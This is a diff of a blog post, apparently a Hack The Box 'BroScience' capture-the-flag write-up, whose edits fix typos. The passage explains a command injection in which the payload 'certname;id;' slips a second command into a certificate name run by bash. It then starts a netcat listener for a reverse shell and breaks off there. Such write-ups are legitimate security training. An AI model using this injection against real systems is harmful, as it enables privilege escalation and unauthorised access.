hanzbzz/hanzbzz.github.io/_posts/2023-04-09-HTB-broscience.md

 ```bash
 /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
 ```
-This last command is interesting, becasue it executes a command where i control a part of it (the `commonName` variable).
+This last command is interesting because it executes a command where i control a part of it (the `commonName` variable).
 I can abuse this by putting a semicolon character in the `commonName` variable.
 A sample payload that executes the `id` command:
 ```bash
 commonName="certname;id;"
 ```
-The second semicolon is necessary, since the script adds the `.crt` extension to to the certificate name and it would break the command.
+The second semicolon is necessary since the script adds the `.crt` extension to the certificate name, and it would break the command.

-After the variable substitution the final command will look like this:
+After the variable substitution, the final command will look like this:
 ```bash
 /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/certname;id;.crt"
 ```
-I can test on my local machine that this explout indeed works.
+I can test on my local machine that this exploit indeed works.

 Now let's get the root shell!
-First i will setup a listener to catch the reverse shell:
+First, i will setup a listener to catch the reverse shell:
 ```bash
 nc -lvnp 9999
 listening on [any] 9999 ...